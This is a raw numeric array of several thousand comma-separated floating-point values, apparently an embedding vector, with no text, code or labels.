0.013251635245978832, -0.005752245895564556, -0.00588550278916955, 0.027258390560746193, 0.023008983582258224, 0.013784661889076233, 0.02130625955760479, -0.0015204214723780751, -0.011104721575975418, -0.00405692495405674, -0.01664227619767189, 0.004167972132563591, 0.0008680191240273416, 0.002781732939183712, -0.007240278646349907, -0.007640048861503601, 0.01456939522176981, 0.005674513056874275, -0.024356357753276825, -0.008372960612177849, -0.008802343159914017, -0.003327714977785945, 0.0021820778492838144, 0.019218571484088898, 0.009942428208887577, -0.0008421081001870334, 0.008165672421455383, 0.006366707384586334, -0.007980593480169773, 0.013384891673922539, 0.01664227619767189, -0.006870121229439974, -0.02768777310848236, -0.004693595692515373, -0.0030463954899460077, 0.00949083548039198, 0.01140084769576788, -0.013555164448916912, -0.008639473468065262, 0.0066665345802903175, -0.0010188582818955183, -0.012170775793492794, -0.004978617187589407, 0.005167397204786539, 0.0056967223063111305, 0.010460647754371166, -0.01748623512685299, 0.007280996069312096, -0.01223740354180336, 0.0027576726861298084, -0.0155910300090909, 0.003768202383071184, 0.012378063052892685, 0.016050025820732117, -0.011859843507409096, -0.008239704184234142, -0.011060303077101707, -0.01566506177186966, 0.0020469704177230597, -0.012674189172685146, -0.004260511603206396, 0.010075684636831284, -0.0226980522274971, -0.007743692956864834, 0.004797239787876606, -0.010105296969413757, 0.005600481294095516, -0.00010561053204583004, 0.01640537567436695, 0.001277043018490076, -0.015442966483533382, 0.027909867465496063, -0.0008578397682867944, 0.0022635124623775482, 0.02046230062842369, -0.004253108520060778, 0.00737723708152771, -0.002892780117690563, -0.016094444319605827, 0.00611870177090168, 0.006981168407946825, -0.006596204824745655, -0.0060927909798920155, -0.0004502039519138634, -0.015324516221880913, 0.009350175969302654, -0.009364982135593891, 0.008861567825078964, -0.002635520650073886, 0.0030519478023052216, 0.012022712267935276, -0.025629699230194092, -0.0009351101471111178, -0.011830230243504047, -0.03094515949487686, 0.012274419888854027, -0.01995888724923134, -0.013236829079687595, 0.0034591208677738905, -0.0013390444219112396, 0.03352145478129387, -0.015975993126630783, 0.0035979298409074545, 0.002594803459942341, -0.01724933460354805, -0.013407100923359394, -0.012703802436590195, -0.01798965036869049, -0.004445590544492006, -0.005426507443189621, 0.01692359708249569, -0.00707370787858963, -0.005789261776953936, -0.025836987420916557, 0.0038792495615780354, 0.027258390560746193, -0.011067706160247326, -0.012326241470873356, -0.015739092603325844, 0.015620642341673374, 0.014850715175271034, -0.004390066955238581, -0.006881226319819689, 0.00042776315240189433, -0.022209443151950836, 0.006529576610773802, -0.008476604707539082, -0.006877524312585592, -0.017797168344259262, 0.013747645542025566, 0.0015537356957793236, 0.0020377165637910366, 0.012592755258083344, -0.005641198717057705, 0.005226622335612774, 0.007765902206301689, -0.03298842906951904, 0.018152518197894096, 0.001172473537735641, -0.002639222191646695, -0.0007768678478896618, 0.01920376531779766, 0.010075684636831284, -0.0016194386407732964, 0.03482440859079361, -0.012281822971999645, -0.02811715565621853, 0.009846187196671963, 0.006796089932322502, -0.005274742841720581, 0.007099619135260582, -0.010097893886268139, 0.004193883389234543, -0.007817724719643593, -0.002269064774736762, 0.026118306443095207, 0.004541831091046333, -0.0018766979919746518, 0.004175375681370497, 0.011134334839880466, 0.010342197492718697, -0.009535254910588264, 0.013703227043151855, -0.0015380040276795626, -0.016745921224355698, -0.001868369523435831, 0.0015713181346654892, 0.0006181628559716046, -0.008854164741933346, 0.012348450720310211, 0.004175375681370497, -0.017974844202399254, -0.005056350026279688, 0.01545777264982462, 0.00978696160018444, -0.012800042517483234, 0.011371235363185406, 0.00876532681286335, 0.021380292251706123, -0.021617192775011063, -0.003960684407502413, -0.013355279341340065, 0.0033795370254665613, -0.02083245851099491, -0.012363256886601448, -0.002174674766138196, -0.014761877246201038, -0.009579673409461975, -0.01705685257911682, -0.003864443162456155, -0.0000426259393861983, 0.008491410873830318, -0.021276647225022316, -0.01055688876658678, -0.03971048444509506, 0.0016777383862063289, 0.0005575495888479054, -0.004675087984651327, 0.017456622794270515, 0.01622769981622696, -0.01985524222254753, 0.01883360929787159, 0.003179652150720358, -0.0040976423770189285, -0.042346008121967316, -0.008706102147698402, 0.005393193569034338, -0.00311672524549067, 0.008883778005838394, 0.016612663865089417, -0.004290124401450157, 0.0155910300090909, 0.02061036415398121, -0.009179903194308281, 0.007751096040010452, 0.0046639833599328995, 0.011008481495082378, 0.015013583935797215, 0.007388341706246138, 0.008306331932544708, -0.013666211627423763, 0.006492560729384422, -0.009276144206523895, 0.002054373500868678, 0.012281822971999645, 0.013236829079687595, -0.006799791473895311, 0.026917846873402596, 0.013473729602992535, -0.005222920794039965, 0.013755048625171185, 0.020728815346956253, -0.015768704935908318, 0.011756199412047863, 0.013577373698353767, -0.026266369968652725, -0.016805145889520645, -0.010179328732192516, 0.004049521870911121, 0.00013452908024191856, 0.021824480965733528, 0.02204657532274723, -0.013784661889076233, -0.000022064850782044232, -0.0020784337539225817, 0.00852842628955841, -0.012503917329013348, 0.001757322228513658, -0.011504491791129112, 0.026281176134943962, -0.010682743042707443, 0.010964062064886093, 0.003331416519358754, -0.011415653862059116, 0.0051859053783118725, -0.015280097723007202, 0.024918995797634125, -0.022490764036774635, 0.024815352633595467, -0.012696398422122002, 0.01809329353272915, -0.007506791967898607, -0.0028520626947283745, 0.026044275611639023, 0.000714403809979558, -0.002376410411670804, -0.004390066955238581, -0.0016740368446335196, -0.021646805107593536, 0.0053561776876449585, -0.005237727425992489, 0.029153596609830856, 0.03621619939804077, 0.0014713756972923875, 0.00045205472270026803, -0.005171098746359348, -0.014732264913618565, -0.023467978462576866, 0.0011706227669492364, -0.00948343239724636, -0.0007736289408057928, 0.037637606263160706, 0.000989245600067079, 0.007473478093743324, -0.01640537567436695, 0.011312009766697884, -0.02209099382162094, -0.00292609422467649, 0.009542657993733883, -0.003853338537737727, -0.010245956480503082, -0.007980593480169773, 0.000685716571751982, 0.041428014636039734, -0.007084812503308058, -0.0016083338996395469, 0.004567742347717285, 0.008321138098835945, -0.001810995046980679, 0.006277869455516338, -0.006814597640186548, -0.027850642800331116, 0.0011669212253764272, -0.011112125590443611, -0.014339897781610489, -0.030012361705303192, 0.0037941134069114923, -0.004031014163047075, -0.014732264913618565, 0.01878918893635273, -0.02619233727455139, 0.005918816663324833, 0.016346151009202003, 0.012222597375512123, 0.004708402324467897, -0.0013816124992445111, 0.007788111921399832, 0.008002802729606628, -0.01069754920899868, -0.015975993126630783, 0.018389420583844185, -0.03692690283060074, -0.010845611803233624, -0.004578846972435713, -0.002829853445291519, -0.017278946936130524, -0.004190181847661734, 0.030412131920456886, -0.0070626032538712025, 0.0018193236319348216, -0.003546107793226838, -0.018122905865311623, -0.01794523000717163, -0.007410550955682993, -0.009357579052448273, 0.009083662182092667, -0.023882554844021797, 0.017678717151284218, -0.00420868955552578, 0.008572845719754696, -0.012437288649380207, -0.029360884800553322, -0.007499388884752989, -0.007007079664617777, -0.007280996069312096, 0.0002053216885542497, -0.015006180852651596, -0.010268166661262512, 0.025807373225688934, -0.010001652874052525, 0.000011690322935464792, 0.015065406449139118, 0.006525875069200993, 0.01724933460354805, 0.001728635048493743, 0.018907640129327774, -0.006548084318637848, 0.006851613521575928, -0.007595629896968603, -0.0032629375346004963, 0.007314310409128666, 0.0014584201853722334, -0.003960684407502413, 0.024371163919568062, 0.011023287661373615, -0.0024319342337548733, -0.013170200400054455, -0.020565945655107498, 0.0049712141044437885, 0.010971465148031712, 0.006418529432266951, 0.015294903889298439, -0.012874074280261993, -0.0012881477596238256, -0.003255534451454878, -0.0142140444368124, -0.0014075235230848193, -0.02620714344084263, 0.002322737593203783, -0.0032925501000136137, -0.00890598725527525, 0.008261913433670998, 0.019914468750357628, -0.021706029772758484, 0.006459246855229139, 0.007473478093743324, -0.014821101911365986, -0.02024020627140999, 0.023319916799664497, 0.01361438911408186, 0.01020894106477499, -0.00913548469543457, -0.0001760561135597527, 0.006096492521464825, -0.008861567825078964, -0.010564291849732399, 0.019544310867786407, -0.008150866255164146, 0.005359879229217768, -0.00680719455704093, 0.005607884842902422, 0.0009212292497977614, 0.041753754019737244, 0.02740645408630371, -0.0025263242423534393, 0.00672576017677784, 0.007751096040010452, 0.007243980187922716, 0.010401423089206219, -0.002269064774736762, -0.0000740893156034872, 0.0026540285907685757, 0.023512398824095726, -0.0051748002879321575, 0.030308488756418228, -0.007965787313878536, -0.00436045415699482, -0.01776755601167679, 0.0032536834478378296, 0.019455473870038986, 0.0025300257839262486, -0.015095018781721592, 0.01242248248308897, 0.010623517446219921, 0.007040394004434347, -0.013140588067471981, -0.027821030467748642, -0.009875799529254436, 0.008935599587857723, 0.022860921919345856, 0.009142887778580189, -0.00016009307000786066, 0.0036164377816021442, 0.017797168344259262, -0.020862070843577385, 0.02666613832116127, -0.018048875033855438, -0.0013880901969969273, -0.02115819789469242, -0.013525551185011864, -0.0047269100323319435, 0.021039746701717377, 0.02573334239423275, -0.03278113901615143, 0.029198015108704567, 0.0052932510152459145, -0.008498813956975937, -0.011200962588191032, 0.00267438730224967, -0.0008879150846041739, 0.002753971144556999, 0.0060187592171132565, -0.008106446824967861, -0.01748623512685299, -0.02568892389535904, -0.00432343827560544, 0.006337094586342573, -0.0005459821550175548, -0.002424530917778611, 0.010505067184567451, 0.010460647754371166, -0.03298842906951904, -0.009898008778691292, -0.026073887944221497, -0.0021987350191920996, -0.0025707432068884373, 0.0019932975992560387, 0.02367526665329933, -0.01074196770787239, -0.01570948027074337, -0.009009631350636482, -0.0015185707015916705, 0.000739389390219003, -0.008350751362740993, -0.023808524012565613, -0.022949758917093277, -0.011571120470762253, 0.0007116275955922902, -0.018122905865311623, -0.002620714483782649, -0.010853014886379242, 0.015650255605578423, 0.01248911116272211, -0.004460396710783243, -0.002692895010113716, -0.0149173429235816, -0.004841658752411604, -0.0020044022239744663, -0.00653697969391942, -0.0097203329205513, -0.003151890356093645, -0.01170437689870596, -0.0050489469431340694, -0.008935599587857723, -0.029612591490149498, 0.00031902940827421844, 0.000007880304110585712, 0.016953209415078163, -0.0005654154228977859, 0.007532703224569559, -0.028783438727259636, 0.013777258805930614, -0.011297203600406647, 0.017604686319828033, 0.0018915042746812105, -0.007362430915236473, -0.001178951351903379, 0.008328541181981564, -0.014880327507853508, -0.008891181088984013, -0.0224759578704834, -0.01907050982117653, 0.010793790221214294, -0.009594479575753212, -0.009920218028128147, -0.004923093598335981, 0.029079565778374672, 0.005115575157105923, 0.004019909538328648, 0.020106950774788857, 0.036156974732875824, -0.003385089337825775, -0.0011354577727615833, 0.003590526757761836, 0.006644325330853462, -0.024089843034744263, 0.0007097768248058856, -0.008595054969191551, -0.001216892502270639, 0.0073587289080023766, 0.002146912971511483, 0.004519621841609478, -0.03248501196503639, -0.01193387433886528, -0.011363832280039787, -0.01373283937573433, -0.021143389865756035, 0.001279819174669683, 0.006744267884641886, 0.02154316008090973, -0.010956658981740475, 0.005678214598447084, -0.0057596489787101746, 0.013036943972110748, 0.017352979630231857, -0.0038237259723246098, 0.02480054646730423, 0.007625242695212364, 0.018937252461910248, 0.002705850638449192, -0.01331085991114378, -0.017116079106926918, 0.005411701276898384, -0.010638323612511158, 0.006222345866262913, -0.014828505925834179, -0.008743117563426495, -0.009920218028128147, 0.007480881176888943, -0.003590526757761836, 0.023512398824095726, -0.016849564388394356, -0.024859771132469177, -0.010490261018276215, -0.011608135886490345, 0.019870048388838768, 0.011948680505156517, -0.008609861135482788, -0.0013890156988054514, -0.004338244907557964, -0.002563339890912175, 0.0022579601500183344, 0.00489348080009222, 0.024089843034744263, -0.0023338424507528543, -0.013362682424485683, -0.016760727390646935, -0.01841903291642666, 0.0328107513487339, 0.011645152233541012, 0.0066036079078912735, -0.008158269338309765, 0.007973190397024155, -0.007869546301662922, 0.002183928620070219, -0.010016459040343761, -0.028798244893550873, 0.015117228031158447, -0.016523826867341995, -0.008757923729717731, -0.0018989074742421508, 0.019870048388838768, -0.0021395098883658648, -0.0027946883346885443, 0.0032703406177461147, 0.014465751126408577, 0.006311183795332909, 0.01827096939086914, 0.021513547748327255, -0.001830428373068571, -0.002054373500868678, 0.011289800517261028, -0.012570545077323914, -0.007847337052226067, -0.024637676775455475, 0.009002228267490864, 0.021232228726148605, 0.005541256163269281, -0.020269818603992462, -0.002317185280844569, 0.016153668984770775, 0.018478257581591606, 0.020269818603992462, -0.003000125754624605, -0.002352350391447544, -0.01097886823117733, 0.016390569508075714, -0.005411701276898384, -0.013199812732636929, 0.006696147378534079, -0.004230899270623922, 0.010001652874052525, -0.008972615003585815, -0.006214942783117294, -0.01547257974743843, -0.003224070882424712, -0.0241046492010355, 0.006855315063148737, -0.0185967069119215, -0.009838784113526344, -0.014599007554352283, 0.0067738802172243595, -0.012674189172685146, -0.005567167419940233, -0.01463602390140295, 0.013569970615208149, -0.0021339573431760073, 0.01153410505503416, -0.026651332154870033, -0.006640623789280653, -0.007913964800536633, -0.008868970908224583, 0.018774382770061493, 0.003125979332253337, -0.0069108386524021626, 0.002317185280844569, -0.0062186443246901035, -0.011038093827664852, 0.001495435950346291, -0.015413354150950909, -0.018359806388616562, 0.019174152985215187, -0.013518148101866245, -0.0009725885465741158, -0.007355027366429567, -0.006544382777065039, -0.033728741109371185, -0.00699227349832654, -0.008424782194197178, -0.04083576425909996, 0.0023967691231518984, 0.010897434316575527, -0.004567742347717285, -0.0039051605854183435, 0.009113275445997715, -0.022860921919345856, 0.006681341212242842, 0.0213506780564785, -0.00042082270374521613, 0.012348450720310211, -0.006085387896746397, -0.002594803459942341, 0.009564867243170738, 0.004153165966272354, -0.014954359270632267, -0.010201537981629372, 0.012155968695878983, -0.011541508138179779, -0.000014950888726161793, -0.013059153221547604, -0.004808344412595034, -0.006033565849065781, 0.03532782196998596, 0.013858692720532417, 0.017841586843132973, 0.010505067184567451, -0.0006995974690653384, -0.011808020994067192, 0.006329691503196955, 0.004515920300036669, -0.014791489578783512, 0.014584201388061047, -0.008891181088984013, 0.017071658745408058, -0.013362682424485683, -0.009801767766475677, -0.006940451450645924, 0.004023611079901457, 0.01896686479449272, -0.00920951645821333, 0.0013168349396437407, -0.004775030538439751, 0.016997627913951874, 0.014909939840435982, -0.019796017557382584, 0.007014482747763395, -0.014162221923470497, 0.018626321107149124, 0.014473154209554195, 0.006103895604610443, -0.008099043741822243, 0.012548335827887058, -0.015006180852651596, 0.007003378123044968, 0.005097067449241877, -0.0063889166340231895, -0.0016000053146854043, 0.012296629138290882, 0.0014149267226457596, -0.0073402212001383305, 0.014354703947901726, -0.0090170344337821, 0.012925896793603897, 0.00737723708152771, 0.0074586714617908, 0.015650255605578423, 0.003853338537737727, 0.033906418830156326, -0.011882052756845951, -0.005944727919995785, -0.004464098252356052, 0.0044826059602200985, -0.020491912961006165, 0.017782362177968025, -0.0012224448146298528, -0.01775274984538555, 0.00008079841791186482, 0.02041788212954998, 0.03645310178399086, -0.00018022039148490876, -0.022401925176382065, 0.009409401565790176, 0.01757507398724556, 0.021528353914618492, -0.007007079664617777, 0.010927046649158001, -0.002093240153044462, 0.014125206507742405, -0.003064903197810054, 0.0020432688761502504, -0.005763350520282984, -0.004667684901505709, -0.014458348043262959, 0.013666211627423763, 0.02143951691687107, 0.002563339890912175, -0.011015884578227997, 0.015768704935908318, 0.0221946369856596, 0.000009832306204771157, 0.018803995102643967, -0.0011900560930371284, -0.030471356585621834, 0.0012881477596238256, 0.028131961822509766, 0.0027724788524210453, 0.0005584749742411077, -0.02102494053542614, 0.010349600575864315, -0.008780133910477161, 0.00864687655121088, -0.010282972827553749, -0.0033073562663048506, -0.015124631114304066, 0.006525875069200993, -0.006766477134078741, 0.01372543629258871, -0.00653697969391942, 0.00949083548039198, -0.00474171619862318, 0.02414906956255436, 0.007847337052226067, 0.011326816864311695, 0.005970638711005449, -0.0008203613688237965, 0.014243656769394875, 0.0015065405750647187, -0.03701573982834816, -0.008498813956975937, 0.009224322624504566, 0.006670236587524414, -0.0017906364519149065, -0.017308559268712997, -0.01570948027074337, 0.0006306556751951575, -0.006044670473784208, -0.009912814944982529, -0.004075433127582073, 0.021454323083162308, 0.010482857935130596, 0.024489613249897957, -0.0005214592674747109, 0.0016175878699868917, -0.01398454699665308, 0.014902536757290363, -0.005800366401672363, -0.004445590544492006, -0.006877524312585592, 0.000695433234795928, 0.01014231238514185, 0.014584201388061047, 0.011223172768950462, -0.0051970100030303, 0.0014352853177115321, 0.0026503270491957664, -0.010186731815338135, -0.009327966719865799, 0.012763027101755142, 0.0019710881169885397, -0.008624667301774025, 0.01044584158807993, 0.005748544353991747, -0.008187881670892239, -0.016583051532506943, -0.01046805176883936, 0.0009253934840671718, -0.001943326322361827, -0.003242578823119402, -0.02759893611073494, 0.01004607230424881, 0.008957808837294579, 0.016005605459213257, -0.02373449318110943, 0.003714529564604163, 0.027539711445569992, -0.03796334192156792, -0.03239617496728897, -0.010083087719976902, 0.003242578823119402, -0.009268741123378277, 0.0023782614152878523, 0.020299432799220085, 0.009024437516927719, 0.005511643830686808, 0.01104549691081047, -0.0034979875199496746, -0.0003037604037672281, -0.0032629375346004963, 0.013059153221547604, -0.0004150389868300408, -0.008987422101199627, -0.0022357506677508354, 0.0006399095873348415, -0.01716049760580063, -0.000024841032427502796, 0.0029001832008361816, 0.0045566377229988575, 0.013222021982073784, 0.020343851298093796, -0.014998777769505978, -0.02586659975349903, -0.012348450720310211, -0.03304765373468399, 0.004612161312252283, 0.0037589482963085175, 0.007788111921399832, -0.010505067184567451, -0.00013267829490359873, -0.015561416745185852, 0.010756773874163628, 0.005037842318415642, 0.011104721575975418, -0.004608459770679474, 0.020388269796967506, -0.004197584930807352, 0.00596693716943264, 0.013873499818146229, -0.010734564624726772, 0.034942857921123505, 0.02955336682498455, -0.013599582947790623, -0.002961259102448821, -0.03737109154462814, 0.004412276204675436, 0.01775274984538555, 0.00864687655121088, -0.01111952867358923, -0.005811471026390791, -0.040391575545072556, 0.0051414864137768745, 0.011571120470762253, -0.02870940789580345, 0.0010281121358275414, -0.004656580276787281, 0.0017230827361345291, -0.019040897488594055, 0.018611514940857887, 0.001612035441212356, 0.01009049080312252, 0.003942176233977079, -0.02032904513180256, 0.014480557292699814, -0.0006871046498417854, 0.011460073292255402, -0.007987996563315392, -0.02471170760691166, 0.015013583935797215, 0.01384388655424118, -0.0037274849601089954, 0.00974254310131073, -0.0076178391464054585, -0.036245811730623245, 0.009794364683330059, -0.005685617681592703, 0.02638481929898262, -0.009957234375178814, 0.0032185185700654984, 0.021143389865756035, -0.004852763377130032, 0.010031265206634998, -0.006744267884641886, 0.00447520287707448, -0.013281247578561306, 0.002790986793115735, -0.006170523818582296, -0.0010697549441829324, 0.014932150021195412, -0.019381441175937653, 0.0013890156988054514, -0.015324516221880913, -0.007899158634245396, 0.004234600812196732, 0.00022348253696691245, 0.017086464911699295, -0.01673111505806446, -0.014073383994400501, -0.010808596387505531, 0.008928196504712105, 0.003875548020005226, -0.014510170556604862, -0.004808344412595034, -0.004068030044436455, -0.0032037124037742615, 0.014554589055478573, -0.005611586384475231, 0.0010938150808215141, -0.010009055957198143, 0.02480054646730423, -0.016819952055811882, 0.004093940835446119, -0.030219649896025658, 0.025200316682457924, -0.0042679146863520145, -0.019262991845607758, -0.003264788305386901, 0.016153668984770775, -0.004042118787765503, -0.007839933969080448, -0.017649104818701744, -0.029538560658693314, 0.011793214827775955, -0.020847264677286148, 0.0015315262135118246, -0.008084237575531006, 0.010941852815449238, 0.008291525766253471, 0.011341623030602932, 0.022313088178634644, 0.00813606008887291, -0.00909106619656086, 0.014539782889187336, 0.023482784628868103, 0.013836483471095562, 0.006425932515412569, 0.014680442400276661, 0.0029223926831036806, -0.0037552467547357082, 0.013629195280373096, 0.023467978462576866, 0.006063178181648254, 0.021469129249453545, 0.000027400323233450763, 0.013214618898928165, 0.02391216903924942, -0.008868970908224583, 0.010897434316575527, 0.004186480306088924, 0.00949083548039198, 0.0002741478383541107, 0.001947027980349958, 0.016094444319605827, 0.012622367590665817, 0.022727664560079575, 0.008987422101199627, -0.0037404405884444714, 0.0009966487996280193, 0.0016536781331524253, 0.002254258608445525, 0.0009762901463545859, 0.007562315557152033, 0.0011484132846817374, -0.007021885830909014, 0.005622691009193659, 0.009749946184456348, -0.019307410344481468, 0.01631653867661953, -0.0032185185700654984, 0.0013251635245978832, 0.012044921517372131, -0.022668439894914627, 0.018285775557160378, 0.011386041529476643, 0.003786710323765874, -0.013584776781499386, -0.008609861135482788, -0.00024800546816550195, 0.01822655089199543, 0.006022460758686066, -0.02666613832116127, -0.017649104818701744, -0.018892833963036537, 0.0024319342337548733, 0.0001329096412518993, -0.003949579317122698, -0.00002790639700833708, -0.012600158341228962, -0.002652177819982171, -0.006866419687867165, -0.0006288049044087529, -0.014140012674033642, 0.0329292006790638, -0.00039144145557656884, 0.002835405757650733, 0.024741319939494133, 0.017323367297649384, -0.015324516221880913, 0.009498238563537598, 0.007480881176888943, 0.028028318658471107, -0.005796664860099554, -0.008595054969191551, 0.0006325064459815621, -0.006877524312585592, 0.0017314112046733499, -0.03769683092832565, 0.015413354150950909, -0.01846345141530037, -0.002683641156181693, 0.00974254310131073, 0.01644979417324066, -0.008269316516816616, 0.01288888044655323, -0.02391216903924942, 0.007399446330964565, 0.012940702959895134, 0.019455473870038986, 0.019144540652632713, 0.00481204641982913, -0.0029334973078221083, 0.005715230479836464, 0.007099619135260582, 0.006640623789280653, 0.006196435075253248, 0.018345000222325325, -0.007488284260034561, 0.0042494069784879684, -0.014932150021195412, -0.005981743801385164, -0.014288075268268585, 0.017649104818701744, 0.018433839082717896, -0.0030204844661056995, -0.02312743477523327, 0.01398454699665308, 0.019884856417775154, 0.0060816858895123005, -0.010319988243281841, -0.020151369273662567, 0.018285775557160378, -0.020965715870261192, -0.007573420647531748, -0.01020894106477499, 0.001969237346202135, -0.009868396446108818, 0.009476029314100742, -0.023749299347400665, 0.00829892884939909, 0.0050674546509981155, 0.011186156421899796, 0.010290375910699368, 0.031033996492624283, 0.016849564388394356, 0.0008657056023366749, -0.015502192080020905, 0.009564867243170738, 0.025481635704636574, -0.0013186857104301453, -0.009646302089095116, -0.015516998246312141, 0.005904010497033596, 0.005644900258630514, 0.006759074050933123, 0.018537482246756554, 0.020847264677286148, 0.006055775098502636, -0.013096168637275696, -0.02120261639356613, 0.014206641353666782, 0.0031333824153989553, 0.02126184105873108, 0.02586659975349903, -0.005211816169321537, -0.009401997551321983, -0.004327139817178249, -0.004671386443078518, -0.004571443889290094, 0.00300197652541101, 0.010127506218850613, -0.011808020994067192, 0.02186889946460724, 0.021691223606467247, -0.0020044022239744663, 0.014821101911365986, 0.010719758458435535, -0.006966362241655588, 0.002361604245379567, 0.01957392320036888, 0.016760727390646935, 0.01422144751995802, 0.010134909301996231, -0.010482857935130596, -0.020521527156233788, 0.019514698535203934, 0.007077409420162439, 0.008735714480280876, 0.012318838387727737, -0.003546107793226838, -0.018478257581591606, 0.015605836175382137, 0.0005390417063608766, 0.025067059323191643, 0.006585100200027227, 0.008195284754037857, -0.009587076492607594, 0.0005381163209676743, 0.014125206507742405, 0.026532882824540138, -0.00028502120403572917, -0.0016296179965138435, -0.00127056532073766, 0.013421907089650631, -0.01249651424586773, -0.012518723495304585, 0.020876877009868622, 0.003812621347606182, -0.01547257974743843, -0.0026540285907685757, -0.004586250055581331, 0.0016314687673002481, 0.009572270326316357, -0.004708402324467897, -0.004471501335501671, 0.021247034892439842, 0.017545461654663086, -0.018196938559412956, 0.0033795370254665613, -0.000923080020584166, -0.008047222159802914, -0.002822450129315257, -0.0007819575257599354, 0.006307482253760099, 0.0022079888731241226, -0.011808020994067192, 0.018611514940857887, -0.0135403573513031, 0.007839933969080448, -0.016538633033633232, -0.003675662912428379, 0.004108747001737356, 0.0042679146863520145, -0.003853338537737727, -0.022253863513469696, -0.020210593938827515, 0.020062530413269997, -0.014613814651966095, 0.00699227349832654, -0.02536318451166153, -0.0019932975992560387, -0.018256163224577904, 0.008498813956975937, 0.012555738911032677, 0.005071156192570925, -0.002857615239918232, 0.0013538507046177983, -0.02093610353767872, 0.002019208623096347, 0.01599079929292202, 0.015428160317242146, 0.007406849414110184, 0.004756522830575705, -0.0045899515971541405, 0.0024411880876868963, -0.023364335298538208, 0.005274742841720581, 0.01295550912618637, 0.005337669514119625, 0.004638072103261948, 0.008491410873830318, -0.0016425735084339976, 0.00948343239724636, 0.011304606683552265, 0.014717457816004753, 0.010460647754371166, -0.018774382770061493, -0.006055775098502636, 0.006899734027683735, 0.00459365313872695, -0.012481707148253918, -0.005792963318526745, -0.013532954268157482, -0.006181628443300724, 0.00032064886181615293, -0.014673039317131042, -0.0009045721380971372, -0.012096744030714035, 0.024400776252150536, 0.0008694072021171451, 0.007240278646349907, 0.021661611273884773, 0.01296291220933199, 0.01295550912618637, -0.010157119482755661, -0.016138862818479538, 0.010549485683441162, -0.014421332627534866, -0.0032074139453470707, -0.0055708689615130424, -0.014362107031047344, -0.04116150364279747, -0.006026162300258875, 0.005415402818471193, -0.007625242695212364, -0.004597355145961046, 0.006355602759867907, 0.0003113949205726385, -0.018907640129327774, 0.0046639833599328995, 0.006337094586342573, 0.009564867243170738, 0.0123040322214365, -0.004234600812196732, 0.003603482386097312, 0.0021672716829925776, 0.013925321400165558, 0.018522676080465317, -0.006366707384586334, 0.011089915409684181, -0.008173075504601002, 0.012444691732525826, 0.014369510114192963, -0.012429885566234589, -0.013081362470984459, 0.00906885601580143, -0.03443944454193115, -0.01915934681892395, 0.013858692720532417, 0.016790339723229408, 0.02223905734717846, 0.013347876258194447, -0.012215194292366505, -0.0006746118888258934, -0.013458923436701298, 0.02395658753812313, 0.0038237259723246098, 0.0019340724684298038, -0.0123040322214365, 0.014680442400276661, -0.01111952867358923, -0.0025744447484612465, -0.0039273700676858425, 0.055967800319194794, -0.003827427513897419, 0.028679795563220978, -0.001871145679615438, 0.0012326241703704, -0.0007134783663786948, -0.004986020270735025, -0.007417954504489899, 0.004334543365985155, 0.0030038272961974144, -0.005796664860099554, 0.001279819174669683, 0.017234528437256813, -0.008728311397135258, -0.003044544719159603, -0.000584848690778017, 0.00424200389534235, -0.006944152992218733, 0.0004696371906902641, -0.01692359708249569, -0.022920146584510803, 0.009261338040232658, 0.03269230201840401, -0.01522087212651968, -0.0035849744454026222, -0.006333393044769764, 0.016849564388394356, -0.01211895328015089, 0.011867246590554714, -0.007751096040010452, 0.03029368259012699, -0.008402572944760323, -0.011474879458546638, -0.00450851721689105, 0.007899158634245396, 0.021972542628645897, -0.0014648978831246495, 0.01716049760580063, 0.0015944530023261905, -0.0012067131465300918, -0.004826852586120367, 0.007292100694030523, -0.0249486081302166, 0.004112448543310165, 0.004223495721817017, 0.004478904418647289, -0.011267591267824173, 0.004578846972435713, 0.013066556304693222, 0.01456939522176981, 0.005148889496922493, 0.004756522830575705, -0.008868970908224583, 0.016479408368468285, -0.009379788301885128, 0.017042046412825584, 0.011748796328902245, -0.01701243408024311, -0.016434988006949425, -0.016020411625504494, -0.011711779981851578, -0.00906885601580143, -0.008261913433670998, -0.01503579318523407, -0.021557966247200966, 0.0033795370254665613, 0.014954359270632267, 0.02488938346505165, -0.00997944362461567, 0.033403005450963974, 0.003366581629961729, 0.005596779752522707, -0.01966276206076145, -0.0008967063040472567, -0.0014075235230848193, -0.010645726695656776, 0.017589880153536797, 0.007273592986166477, 0.011474879458546638, 0.009446416981518269, -0.0013029540423303843, -0.007462373003363609, 0.018345000222325325, -0.0056634084321558475, -0.007166247349232435, -0.007121828384697437, -0.011260188184678555, 0.0010975167388096452, -0.02004772424697876, 0.009698123671114445, 0.020403075963258743, -0.0006116851000115275, -0.013251635245978832, -0.010690146125853062, 0.01790081150829792, -0.0017600985011085868, 0.00020104173745494336, -0.010416229255497456, -0.0001843846548581496, 0.005374685395509005, 0.017841586843132973, 0.013681017793715, -0.01878918893635273, 0.010956658981740475, 0.024311937391757965, 0.008683892898261547, 0.01140084769576788, -0.014421332627534866, 0.0008606159826740623, 0.005515345372259617, 0.021854093298316002, -0.011763602495193481, -0.015050600282847881, 0.013880902901291847, 0.023201465606689453, 0.006984869949519634, -0.005918816663324833, 0.0019858945161104202, 0.018241357058286667, 0.004201286472380161, -0.01644979417324066, -0.014621217735111713, 0.03760799020528793, 0.018774382770061493, 0.012318838387727737, -0.008913390338420868, -0.0076178391464054585, 0.017086464911699295, 0.0039051605854183435, 0.0017369636334478855, -0.013444117270410061, -0.012415079399943352, 0.017145691439509392, 0.009564867243170738, -0.019618341699242592, 0.012133759446442127, -0.010305182076990604, 0.025392796844244003, 0.02172083593904972, -0.0032721913885325193, -0.004952705930918455, 0.039828937500715256, -0.008461798541247845, 0.006499963812530041, -0.016138862818479538, 0.025437217205762863, -0.011156544089317322, 0.018285775557160378, -0.022579601034522057, -0.005578272044658661, 0.00412725517526269, 0.025940630584955215, 0.014561992138624191, 0.0054635233245790005, -0.002753971144556999, -0.006059476640075445, 0.00013823065091855824, 0.015576223842799664, 0.003688618540763855, -0.01205232460051775, 0.004704700782895088, 0.0014121504500508308, 0.00558197358623147, 0.010949255898594856, 0.00585218844935298, 0.0017119779950007796, 0.0014436139026656747, -0.003657155204564333, 0.01522087212651968, 0.0003548884124029428, -0.03278113901615143, 0.0014519423712044954, 0.0003150964912492782, -0.008661683648824692, 0.014813698828220367, 0.01349593885242939, 0.014628620818257332, -0.0019359232392162085, 0.008032415993511677, 0.005593078210949898, 0.014710054732859135, -0.003581272903829813, -0.015324516221880913, 0.017501041293144226, 0.046462155878543854, 0.0005487583694048226, -0.008506217040121555, -0.004079134669154882, 0.018211744725704193, -0.008558039553463459, -0.0005011005559936166, -0.02274247072637081, 0.0013880901969969273, -0.004008804447948933, 